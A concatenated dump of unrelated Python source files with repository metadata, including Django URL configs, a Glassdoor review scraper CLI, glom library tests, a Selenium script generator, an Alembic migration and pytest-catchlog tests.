    height: int = 150,
    disabled: bool = False
) -> Iterable[ImageButton]:
    button_setting = ImageButtonSetting(
        display_label=False,
        image_width=f'{width}px',
        image_height=f'{height}px'
    )

    buttons = []
    for path, value in annotation.items():
        image_button = ImageButton(button_setting)
        image_button.image_path = str(path)
        image_button.label_value = Path(path).stem
        image_button.active = value.get('answer', False)
        image_button.disabled = disabled
        buttons.append(image_button)

    return buttons

# Internal Cell
def _label_store_to_button(
    annotation: LabelStore,
    disabled: bool
) -> Iterable[ActionButton]:
    layout = {
        'width': 'auto',
        'height': 'auto'
    }

    buttons = []
    for label, value in annotation.items():
        button = ActionButton(layout=Layout(**layout))
        button.description = label
        button.value = label
        button.tooltip = label
        button.disabled = disabled
        if value.get('answer', True):
            button.layout.border = 'solid 2px #f7f01e'
        buttons.append(button)

    return buttons
# Internal Cell
class LabelStoreCaster: # pylint: disable=too-few-public-methods
"""Factory that casts the correctly widget
accordingly with the input"""
def __init__(
self,
output: Union[OutputImageLabel, OutputLabel],
width: int = 150,
height: int = 150,
widgets_disabled: bool = False
):
self.width = width
self.height = height
self.output = output
self.widgets_disabled = widgets_disabled
def __call__(self, annotation: LabelStore) -> Iterable:
if isinstance(self.output, OutputImageLabel):
return _label_store_to_image_button(
annotation,
self.width,
self.height,
self.widgets_disabled
)
if isinstance(self.output, OutputLabel):
return _label_store_to_button(
annotation,
disabled=self.widgets_disabled
)
raise ValueError(
f"output should have type OutputImageLabel or OutputLabel. {type(self.output)} given"
) | 29.102941 | 104 | 0.641991 | 427 | 3,958 | 5.69555 | 0.285714 | 0.067845 | 0.024671 | 0.034539 | 0.229441 | 0.171053 | 0.10773 | 0.090461 | 0.090461 | 0.090461 | 0 | 0.0062 | 0.266549 | 3,958 | 136 | 105 | 29.102941 | 0.831554 | 0.074027 | 0 | 0.262136 | 1 | 0 | 0.043025 | 0 | 0 | 0 | 0 | 0 | 0.038835 | 1 | 0.135922 | false | 0 | 0.058252 | 0.038835 | 0.31068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
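A stripped-down, dependency-free sketch of the conversion these helpers perform — a mapping of labels to {'answer': bool} records turned into simple display objects by a small factory (Button here is a stand-in for the ipywidgets-based ImageButton/ActionButton):

from dataclasses import dataclass

@dataclass
class Button:            # stand-in for ImageButton / ActionButton
    label: str
    active: bool

def to_buttons(annotation: dict) -> list:
    return [Button(label, value.get('answer', False))
            for label, value in annotation.items()]

store = {'cat': {'answer': True}, 'dog': {'answer': False}}
print(to_buttons(store))
# [Button(label='cat', active=True), Button(label='dog', active=False)]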
df53e4881da04ab4f402645f9a8a2b4862a0381d | 1,049 | py | Python | flow/urls.py | Xinghui-Wu/FlowMeter | c2780fe7f8b8d2d6136296e53d1ee95e5660afc4 | [
"MIT"
] | null | null | null | flow/urls.py | Xinghui-Wu/FlowMeter | c2780fe7f8b8d2d6136296e53d1ee95e5660afc4 | [
"MIT"
] | null | null | null | flow/urls.py | Xinghui-Wu/FlowMeter | c2780fe7f8b8d2d6136296e53d1ee95e5660afc4 | [
"MIT"
] | 1 | 2021-05-17T13:01:26.000Z | 2021-05-17T13:01:26.000Z | """FlowMeter URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import path
import flow
from . import views
urlpatterns = [
    path('', views.flow_view),
    path('select/', views.select_device),
    path('sniff/', views.sniff),
    path('get_flow/', views.get_flow),
    path('address/', views.address_analyze),
    path('name/', views.name_analyze),
    path('burst/', views.burst_analyze)
]
| 32.78125 | 77 | 0.701621 | 154 | 1,049 | 4.714286 | 0.383117 | 0.082645 | 0.020661 | 0.033058 | 0.161157 | 0.161157 | 0.103306 | 0 | 0 | 0 | 0 | 0.009174 | 0.168732 | 1,049 | 31 | 78 | 33.83871 | 0.823395 | 0.595806 | 0 | 0 | 0 | 0 | 0.098321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.357143 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
df58cc87adff05d56c9092da2fe099ff0776f22b | 6,033 | py | Python | Glassdoor scraping/main.py | stancld/MSc-Project | 31a57ed58a902fe998649b948c61e70ca78729a4 | [
"MIT"
] | 2 | 2021-05-27T12:43:20.000Z | 2022-02-24T07:01:55.000Z | Glassdoor scraping/main.py | stancld/MSc-Project | 31a57ed58a902fe998649b948c61e70ca78729a4 | [
"MIT"
] | 5 | 2021-03-19T08:52:22.000Z | 2021-09-22T19:21:44.000Z | Glassdoor scraping/main.py | stancld/MSc-Project | 31a57ed58a902fe998649b948c61e70ca78729a4 | [
"MIT"
] | 2 | 2020-09-29T03:27:38.000Z | 2020-11-07T05:41:10.000Z | # import libraries
import time
import datetime
from argparse import ArgumentParser
from datetime import date
import re
import json
import numpy as np
import pandas as pd
import django
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from GlassdoorScraper import GlassdoorScraper
from set_django_db import set_django_db
# parameters/arguments
parser = ArgumentParser()
parser.add_argument(
'--chrome_driver_path',
default='/mnt/c/Data/UCL/@MSC Project - Data and sources/chromedriver.exe',
help='An absolute path to the ChromeDriver.'
)
parser.add_argument(
'--headless',
action='store_true',
help='If --headless is passed in, the `headless` browsing is used.'
)
parser.add_argument(
'--email',
help='Email used for log in to the Glassdoor account.'
)
parser.add_argument(
'-p', '--password',
help='Password used for log in to the Glassdoor account.'
)
parser.add_argument(
'-c', '--credentials',
default='/mnt/c/Data/UCL/@MSc Project - Data and sources/credentials.json',
help='Path to credential file containing email and password\
used for log in to the Glassdoor account.'
)
parser.add_argument(
'--companies',
help="An absolute path to the list of companies (txt file)."
)
parser.add_argument(
'-u', '--url',
help='An absolute path to the list of URL address (txt file)\
to the landing page of reviews for a given company.'
)
parser.add_argument(
'--location',
default='London',
help="A location we are interested in.\
Default='London'"
)
parser.add_argument(
'--max_review_age',
help='An indication how old reviews are to be scraped.\
Define if min_date is not provided.'
)
parser.add_argument(
'--min_date',
help="An indication up to which date reviews are to be scraped.\
format='yyyy-mm-dd'\
Define iff max_review_age is not provided."
)
parser.add_argument(
'--mysite_path',
default='/mnt/c/Data/UCL/@MSc Project/DB/mysite/',
help='An absolute path to the django application containing models for the DB.\
This is required iff output_path is not passed in.'
)
parser.add_argument(
'--output_path',
help='An absolute path of the output csv/xlsx file storing the scraped data.\
This is required iff mysite_path is not passed in.'
)
parser.add_argument(
'-l', '--limit',
help='A number of pages to be scraped.\
This is an ideal option for testing, otherwise no limit is passed.'
)
args = parser.parse_args()
# some value assignments and sanity checks
## credentials
if args.credentials:
    try:
        with open(args.credentials) as f:
            credentials = json.loads(f.read())
        args.email = credentials['email']
        args.password = credentials['password']
    except FileNotFoundError:
        raise Exception('The filepath given does not exist.')
else:
    try:
        args.email, args.password = args.email, args.password  # a simple way to verify whether email and password were passed in
    except ValueError:
        raise Exception('Neither filepath to the credentials, nor email and password are specified.\
            Please, provide either path to the file with credentials or email/password directly to cmd.')
## file path to the txt file with companies
if args.companies:
    try:
        with open(args.companies, 'r') as f:
            companies = [line.strip() for line in f]
        print(f"{len(companies)} companies are to be scraped.")
    except FileNotFoundError:
        raise Exception('The filepath given does not exist or the format of the file is not appropriate')
else:
    raise Exception('Filepath to the text file containing companies must be provided.')
## if url provided, the length of the url file and companies file must be the same
if args.url:
    if args.url:
        try:
            with open(args.url, 'r') as f:
                urls = [line.strip() for line in f]
        except FileNotFoundError:
            raise Exception('The filepath given does not exist or the format of the file is not appropriate')
else:
    urls = [None for company in companies]
    raise Exception('Both parameters companies and url must be given.')
## min_date | max_reivew_age
if (args.min_date!=None) & (args.max_review_age!=None):
    raise Exception('Only one parameter out of min_date and max_review_age can be specified!')
## file path to the output files
if args.output_path:
    file_type = args.output_path.split('.')[-1]
    if file_type not in ['csv', 'xlsx', 'xls']:
        raise Exception('Invalid file path format.')
if args.limit:
    try:
        args.limit = int(args.limit)
    except Exception:
        raise TypeError('Limit must be an integer!')
else:
    args.limit = float(np.inf)
#######################
##### APPLICATION #####
#######################
def main():
    if args.mysite_path:
        # import Company - django.db.models.Model
        set_django_db(mysite_path=args.mysite_path)
        from tables_daniel.models import Review, Company
    else:
        Review = None
        Company = None  # Company is passed to the scraper below as well

    scraper = GlassdoorScraper(
        chrome_driver_path=args.chrome_driver_path,
        email=args.email,
        password=args.password,
        headless_browsing=args.headless,
        review_writer=Review,
        company_reader=Company,
        max_review_age=args.max_review_age,
        min_date=args.min_date
    )

    for company_name, url in zip(companies, urls):
        scraper.getOnReviewsPage(
            company_name=company_name,
            location=args.location,
            url=url
        )
        scraper.acceptCookies()
        scraper.scrape(
            company_name=company_name,
            location=args.location,
            limit=args.limit
        )
if __name__=='__main__':
main() | 30.469697 | 132 | 0.671805 | 815 | 6,033 | 4.878528 | 0.258896 | 0.029427 | 0.055584 | 0.022636 | 0.238682 | 0.228119 | 0.191901 | 0.170775 | 0.115694 | 0.115694 | 0 | 0.000215 | 0.227747 | 6,033 | 198 | 133 | 30.469697 | 0.853187 | 0.064479 | 0 | 0.2125 | 0 | 0 | 0.199533 | 0.008613 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00625 | false | 0.075 | 0.10625 | 0 | 0.1125 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
df599e9d10321b7bdbba2162c39d2da1b3bddbed | 468 | py | Python | week12/api/urls.py | yestemir/web | 5bdead66c26a3c466701e25ecae9720f04ad4118 | [
"Unlicense"
] | null | null | null | week12/api/urls.py | yestemir/web | 5bdead66c26a3c466701e25ecae9720f04ad4118 | [
"Unlicense"
] | 13 | 2021-03-10T08:46:52.000Z | 2022-03-02T08:13:58.000Z | week12/api/urls.py | yestemir/web | 5bdead66c26a3c466701e25ecae9720f04ad4118 | [
"Unlicense"
] | null | null | null | from django.urls import path
#from api.views import company_list, company_details, company_vacancies, vacancies_list, vacancy_detail
from api.views import company_list, company_details
urlpatterns = [
    path('companies/', company_list),
    path('companies/<int:company_id>/', company_details),
    #path('companies/<int:company_id>/vacancies/', company_vacancies),
    #path('vacancies/', vacancies_list),
    #path('vacancies/<int:vacancy_id>', vacancy_detail)
]
| 39 | 103 | 0.758547 | 58 | 468 | 5.862069 | 0.293103 | 0.097059 | 0.070588 | 0.105882 | 0.4 | 0.252941 | 0.252941 | 0.252941 | 0 | 0 | 0 | 0 | 0.111111 | 468 | 11 | 104 | 42.545455 | 0.817308 | 0.538462 | 0 | 0 | 0 | 0 | 0.174528 | 0.127358 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
df5bcf4144a389293dde7bcc338b8d079f6fde6d | 6,587 | py | Python | glom/test/test_path_and_t.py | justinvanwinkle/glom | 6451e9800b50078b60ebb480be83385cc70b1b3a | [
"BSD-3-Clause"
] | null | null | null | glom/test/test_path_and_t.py | justinvanwinkle/glom | 6451e9800b50078b60ebb480be83385cc70b1b3a | [
"BSD-3-Clause"
] | null | null | null | glom/test/test_path_and_t.py | justinvanwinkle/glom | 6451e9800b50078b60ebb480be83385cc70b1b3a | [
"BSD-3-Clause"
] | null | null | null |
from pytest import raises
from glom import glom, Path, S, T, A, PathAccessError, GlomError, BadSpec
def test_list_path_access():
    assert glom(list(range(10)), Path(1)) == 1

def test_path():
    _obj = object()
    target = {'a': {'b.b': [None, {_obj: [None, None, 'd']}]}}
    assert glom(target, Path('a', 'b.b', 1, _obj, -1)) == 'd'

def test_empty_path_access():
    target = {}
    assert glom(target, Path()) is target
    assert glom(target, (Path(), Path(), Path())) is target
    dup_dict = glom(target, {'target': Path(),
                             'target2': Path()})
    dup_dict['target'] is target
    dup_dict['target2'] is target

def test_path_t_roundtrip():
    # check that T repr roundtrips
    assert repr(T['a'].b.c()) == "T['a'].b.c()"
    assert repr(T[1:]) == "T[1:]"
    assert repr(T[::3, 1:, 1:2, :2:3]) == "T[::3, 1:, 1:2, :2:3]"
    # check that Path repr roundtrips
    assert repr(Path('a', 1, 'b.b', -1.0)) == "Path('a', 1, 'b.b', -1.0)"
    # check that Path repr roundtrips when it contains Ts
    assert repr(Path(T['a'].b, 'c', T['d'].e)) == "Path(T['a'].b, 'c', T['d'].e)"
    # check that T instances containing Path access revert to repring with Path
    assert repr(Path(T['a'].b, 'c', T['d'].e).path_t) == "Path(T['a'].b, 'c', T['d'].e)"
    # check that Paths containing only T objects reduce to a T (joining the T objects)
    assert repr(Path(T['a'].b, T.c())) == "T['a'].b.c()"
    # check that multiple nested paths reduce
    assert repr(Path(Path(Path('a')))) == "Path('a')"
    # check builtin repr
    assert repr(T[len]) == 'T[len]'
    assert repr(T.func(len, sum)) == 'T.func(len, sum)'

def test_path_access_error_message():
    # test fuzzy access
    with raises(GlomError) as exc_info:
        glom({}, 'a.b')
    assert ("PathAccessError: could not access 'a', part 0 of Path('a', 'b'), got error: KeyError"
            in exc_info.exconly())
    ke = repr(KeyError('a'))  # py3.7+ changed the keyerror repr
    assert repr(exc_info.value) == "PathAccessError(" + ke + ", Path('a', 'b'), 0)"

    # test multi-part Path with T, catchable as a KeyError
    with raises(KeyError) as exc_info:
        # don't actually use glom to copy your data structures please
        glom({'a': {'b': 'c'}}, Path('a', T.copy(), 'd'))
    assert ("PathAccessError: could not access 'd', part 3 of Path('a', T.copy(), 'd'), got error: KeyError"
            in exc_info.exconly())
    ke = repr(KeyError('d'))  # py3.7+ changed the keyerror repr
    assert repr(exc_info.value) == "PathAccessError(" + ke + ", Path('a', T.copy(), 'd'), 3)"

    # test AttributeError
    with raises(GlomError) as exc_info:
        glom({'a': {'b': 'c'}}, Path('a', T.b))
    assert ("PathAccessError: could not access 'b', part 1 of Path('a', T.b), got error: AttributeError"
            in exc_info.exconly())
    ae = repr(AttributeError("'dict' object has no attribute 'b'"))
    assert repr(exc_info.value) == "PathAccessError(" + ae + ", Path(\'a\', T.b), 1)"

def test_t_picklability():
    import pickle

    class TargetType(object):
        def __init__(self):
            self.attribute = lambda: None
            self.attribute.method = lambda: {'key': lambda x: x * 2}

    spec = T.attribute.method()['key'](x=5)
    rt_spec = pickle.loads(pickle.dumps(spec))
    assert repr(spec) == repr(rt_spec)
    assert glom(TargetType(), spec) == 10

    s_spec = S.attribute
    assert repr(s_spec) == repr(pickle.loads(pickle.dumps(s_spec)))

def test_a_forbidden():
    with raises(BadSpec):
        A()  # cannot assign to function call
    with raises(BadSpec):
        glom(1, A)  # cannot assign without destination

def test_s_magic():
    assert glom(None, S.test, scope={'test': 'value'}) == 'value'
    with raises(PathAccessError):
        glom(1, S.a)  # ref to 'a' which doesn't exist in scope
    with raises(PathAccessError):
        glom(1, A.b.c)
    return

def test_path_len():
    assert len(Path()) == 0
    assert len(Path('a', 'b', 'c')) == 3
    assert len(Path.from_text('1.2.3.4')) == 4
    assert len(Path(T)) == 0
    assert len(Path(T.a.b.c)) == 3
    assert len(Path(T.a()['b'].c.d)) == 5

def test_path_getitem():
    path = Path(T.a.b.c)
    assert path[0] == Path(T.a)
    assert path[1] == Path(T.b)
    assert path[2] == Path(T.c)
    assert path[-1] == Path(T.c)
    assert path[-2] == Path(T.b)
    with raises(IndexError, match='Path index out of range'):
        path[4]
    with raises(IndexError, match='Path index out of range'):
        path[-14]
    return

def test_path_slices():
    path = Path(T.a.b, 1, 2, T(test='yes'))
    assert path[::] == path
    # positive indices
    assert path[3:] == Path(2, T(test='yes'))
    assert path[1:3] == Path(T.b, 1)
    assert path[:3] == Path(T.a.b, 1)
    # positive indices backwards
    assert path[2:1] == Path()
    # negative indices forward
    assert path[-1:] == Path(T(test='yes'))
    assert path[:-2] == Path(T.a.b, 1)
    assert path[-3:-1] == Path(1, 2)
    # negative indices backwards
    assert path[-1:-3] == Path()
    # slicing and stepping
    assert path[1::2] == Path(T.b, 2)

def test_path_values():
    path = Path(T.a.b, 1, 2, T(test='yes'))
    assert path.values() == ('a', 'b', 1, 2, ((), {'test': 'yes'}))
    assert Path().values() == ()

def test_path_items():
    path = Path(T.a, 1, 2, T(test='yes'))
    assert path.items() == (('.', 'a'),
                            ('P', 1), ('P', 2),
                            ('(', ((), {'test': 'yes'})))
    assert Path().items() == ()

def test_path_eq():
    assert Path('a', 'b') == Path('a', 'b')
    assert Path('a') != Path('b')
    assert Path() != object()

def test_path_eq_t():
    assert Path(T.a.b) == T.a.b
    assert Path(T.a.b.c) != T.a.b

def test_startswith():
    ref = T.a.b[1]
    assert Path(ref).startswith(T)
    assert Path(ref).startswith(T.a.b)
    assert Path(ref).startswith(ref)
    assert Path(ref).startswith(ref.c) is False
    assert Path('a.b.c').startswith(Path())
    assert Path('a.b.c').startswith('a.b.c')
    with raises(TypeError):
        assert Path('a.b.c').startswith(None)
    return

def test_from_t_identity():
    ref = Path(T.a.b)
    assert ref.from_t() == ref
    assert ref.from_t() is ref

def test_t_dict_key():
    target = {'a': 'A'}
    assert glom(target, {T['a']: 'a'}) == {'A': 'A'}

def test_t_dunders():
    with raises(AttributeError) as exc_info:
        T.__name__
    assert 'use T.__("name__")' in str(exc_info.value)

    assert glom(1, T.__('class__')) is int
| 27.560669 | 108 | 0.570366 | 1,017 | 6,587 | 3.609636 | 0.154376 | 0.020703 | 0.017979 | 0.028603 | 0.409698 | 0.253337 | 0.186598 | 0.148461 | 0.148461 | 0.129937 | 0 | 0.018999 | 0.232883 | 6,587 | 238 | 109 | 27.676471 | 0.7075 | 0.115986 | 0 | 0.113475 | 0 | 0.021277 | 0.141207 | 0 | 0 | 0 | 0 | 0 | 0.468085 | 1 | 0.141844 | false | 0 | 0.021277 | 0 | 0.191489 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df61b88c89a2f284a18232a1fc105ff2477b2b45 | 4,665 | py | Python | FHIR_Tester_backend/services/monkey/MonkeyInterpreter.py | ideaworld/FHIR_Tester | 62844af2de510b65535df5ae60da03a082097df0 | [
"MIT"
] | null | null | null | FHIR_Tester_backend/services/monkey/MonkeyInterpreter.py | ideaworld/FHIR_Tester | 62844af2de510b65535df5ae60da03a082097df0 | [
"MIT"
] | 4 | 2020-06-05T17:40:18.000Z | 2022-02-11T03:38:16.000Z | FHIR_Tester_backend/services/monkey/MonkeyInterpreter.py | bowen1993/FHIR_Tester | 62844af2de510b65535df5ae60da03a082097df0 | [
"MIT"
] | 1 | 2016-11-22T01:04:16.000Z | 2016-11-22T01:04:16.000Z | from CodeGenerator import *
class MonkeyInterpreter:
    def __init__(self, prog, filename="", identify="", base_path=""):
        self.prog = prog
        self.func_table = {}
        self.code_str = ''
        self.filename = filename
        self.url = ''
        self.driver = ''
        self.indent = 0
        self._code_init()
        self.base_path = base_path
        self.id = identify
        self.image_index = 0

    def _code_init(self):
        # the template below is emitted verbatim into the generated script,
        # so its lines intentionally start at column 0
        self.code_str = """from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import time
user_agent = (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50'"
)
steps = []
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = user_agent
"""

    def save(self):
        if len(self.filename) > 0:
            code_file = open(self.filename, 'w')
            code_file.write(self.code_str)
            code_file.close()
            return (True, 'Success')
        else:
            return (False, 'No filename or empty filename')

    def curr_indent(self):
        return ' '*self.indent

    def add_screenshot(self, filename, hint):
        step_info_dict = {
            'basepath': self.base_path,
            'filename':filename,
            'id':self.id,
            'hint':hint
        }
        self.code_str += "driver.get_screenshot_as_file('%(basepath)s/%(id)s_%(filename)s')\nsteps.append(('%(hint)s','%(basepath)s/%(id)s_%(filename)s'))\n" % step_info_dict

    def get_screenshot_code(self, filename, hint):
        step_info_dict = {
            'basepath': self.base_path,
            'filename':filename,
            'id':self.id,
            'hint':hint
        }
        return "driver.get_screenshot_as_file('%(basepath)s/%(id)s_%(filename)s')\nsteps.append(('%(hint)s','%(basepath)s/%(id)s_%(filename)s'))\n" % step_info_dict

    def translate(self):
        for index, action in enumerate(self.prog):
            print action
            if action['type'] == 'auth':
                self.code_str += self.transAuth(action)
            elif 'single' in action['type']:
                self.code_str += self.transSingleAction(action)
            elif 'target' in action['type']:
                self.code_str += self.transTargetAction(action)
            elif 'command' in action['type']:
                self.code_str += self.transCommandAction(action)
            elif 'judge' in action['type']:
                self.code_str += self.transJudgeAction(action)
            elif 'repeat' in action['type']:
                self.code_str += self.transRepeat(action)
            elif 'task' in action['type']:
                self.code_str += self.transTask(action)
            if "driver.get(" in self.code_str:
                self.add_screenshot("%d.png"%self.image_index, action['move'])
                self.image_index += 1
        self.code_str += "driver.close()"

    def transAuth(self, action):
        username = action['username']
        password = action['password']
        return "driver.switch_to.alert.authenticate('%s','%s')" % (username, password)

    def transSingleAction(self, action):
        move = action['move']
        if move == 'DoGenomicAuth':
            is_success, increase,stmt_str = globals()[move](self.get_screenshot_code, self.image_index)
            self.image_index += increase
        else:
            is_success, stmt_str = globals()[move]()
        if is_success:
            return stmt_str

    def transTargetAction(self, action):
        move = action['move']
        args = {
            'target':action['target']
        }
        if 'value' in action:
            args['value'] = action['value']
        is_success, stmt_str = globals()[move](**args)
        if is_success:
            return stmt_str

    def transCommandAction(self, action):
        move = action['move']
        args = {
            'value':action['value']
        }
        is_success, stmt_str = globals()[move](**args)
        if is_success:
            return stmt_str

    def transJudgeAction(self, action):
        args = {
            'target':action['target'],
            'value':action['expect'],
            'is_equal' : action['is_equal']
        }
        is_success, stmt_str = Judge(**args)
        if is_success:
            return stmt_str

    def transRepeat(self, action):
        return ""

    def transTask(self, action):
        return ""

    def get_code_content(self):
return self.code_str | 35.075188 | 174 | 0.569132 | 527 | 4,665 | 4.870968 | 0.244782 | 0.046747 | 0.059992 | 0.052591 | 0.326841 | 0.317491 | 0.286716 | 0.213089 | 0.201013 | 0.201013 | 0 | 0.007657 | 0.300107 | 4,665 | 133 | 175 | 35.075188 | 0.77856 | 0 | 0 | 0.252101 | 0 | 0.02521 | 0.220103 | 0.098157 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.016807 | 0.042017 | null | null | 0.008403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df622c6b331e5a543976b1e74365b5b1c5deac19 | 1,027 | py | Python | migrations/versions/1a869ac514c_.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 35 | 2015-11-14T18:32:45.000Z | 2022-01-23T15:15:05.000Z | migrations/versions/1a869ac514c_.py | codeforamerica/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 119 | 2015-11-20T22:45:34.000Z | 2022-02-10T23:02:36.000Z | migrations/versions/1a869ac514c_.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 19 | 2015-11-20T20:41:52.000Z | 2022-01-26T04:12:34.000Z | """empty message
Revision ID: 1a869ac514c
Revises: 52887f8e06b
Create Date: 2015-09-29 11:06:57.293537
"""
# revision identifiers, used by Alembic.
revision = '1a869ac514c'
down_revision = '52887f8e06b'
from alembic import op
import sqlalchemy as sa
def upgrade():
    ### commands auto generated by Alembic - please adjust! ###
    op.create_table('interesteds',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=255), nullable=False),
    sa.Column('agency', sa.String(length=255), nullable=False),
    sa.Column('location', sa.String(length=255), nullable=False),
    sa.Column('phone', sa.String(length=255), nullable=False),
    sa.Column('email', sa.String(length=255), nullable=False),
    sa.Column('comments', sa.String(length=255), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    ### end Alembic commands ###

def downgrade():
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('interesteds')
    ### end Alembic commands ###
| 28.527778 | 65 | 0.686465 | 130 | 1,027 | 5.4 | 0.407692 | 0.079772 | 0.149573 | 0.179487 | 0.441595 | 0.441595 | 0.441595 | 0.396011 | 0 | 0 | 0 | 0.078341 | 0.15482 | 1,027 | 35 | 66 | 29.342857 | 0.730415 | 0.281402 | 0 | 0 | 0 | 0 | 0.119149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df6c0d5895a889ba43d3854f304957c6a4db6d15 | 2,310 | py | Python | tests/test_compat.py | eisensheng/pytest-catchlog | f6b05b0afb8f8934b33e0c78a495ebfd8b3599d6 | [
"MIT"
] | 85 | 2015-02-24T20:14:30.000Z | 2021-04-29T09:07:59.000Z | tests/test_compat.py | eisensheng/pytest-catchlog | f6b05b0afb8f8934b33e0c78a495ebfd8b3599d6 | [
"MIT"
] | 67 | 2015-04-22T16:07:47.000Z | 2020-03-19T14:14:19.000Z | tests/test_compat.py | eisensheng/pytest-catchlog | f6b05b0afb8f8934b33e0c78a495ebfd8b3599d6 | [
"MIT"
] | 25 | 2015-05-17T15:22:55.000Z | 2019-01-07T09:21:24.000Z | # -*- coding: utf-8 -*-
import pytest
def test_camel_case_aliases(testdir):
    testdir.makepyfile('''
        import logging

        logger = logging.getLogger(__name__)

        def test_foo(caplog):
            caplog.setLevel(logging.INFO)
            logger.debug('boo!')
            with caplog.atLevel(logging.WARNING):
                logger.info('catch me if you can')
    ''')
    result = testdir.runpytest()
    assert result.ret == 0

    with pytest.raises(pytest.fail.Exception):
        result.stdout.fnmatch_lines(['*- Captured *log call -*'])

    result = testdir.runpytest('-rw')
    assert result.ret == 0
    result.stdout.fnmatch_lines('''
        =*warning summary*=
        *WL1*test_camel_case_aliases*caplog.setLevel()*deprecated*
        *WL1*test_camel_case_aliases*caplog.atLevel()*deprecated*
    ''')

def test_property_call(testdir):
    testdir.makepyfile('''
        import logging

        logger = logging.getLogger(__name__)

        def test_foo(caplog):
            logger.info('boo %s', 'arg')
            assert caplog.text == caplog.text() == str(caplog.text)
            assert caplog.records == caplog.records() == list(caplog.records)
            assert (caplog.record_tuples ==
                    caplog.record_tuples() == list(caplog.record_tuples))
    ''')
    result = testdir.runpytest()
    assert result.ret == 0

    result = testdir.runpytest('-rw')
    assert result.ret == 0
    result.stdout.fnmatch_lines('''
        =*warning summary*=
        *WL1*test_property_call*caplog.text()*deprecated*
        *WL1*test_property_call*caplog.records()*deprecated*
        *WL1*test_property_call*caplog.record_tuples()*deprecated*
    ''')

def test_records_modification(testdir):
    testdir.makepyfile('''
        import logging

        logger = logging.getLogger(__name__)

        def test_foo(caplog):
            logger.info('boo %s', 'arg')
            assert caplog.records
            assert caplog.records()

            del caplog.records()[:]  # legacy syntax
            assert not caplog.records
            assert not caplog.records()

            logger.info('foo %s', 'arg')
            assert caplog.records
            assert caplog.records()
    ''')
    result = testdir.runpytest()
    assert result.ret == 0
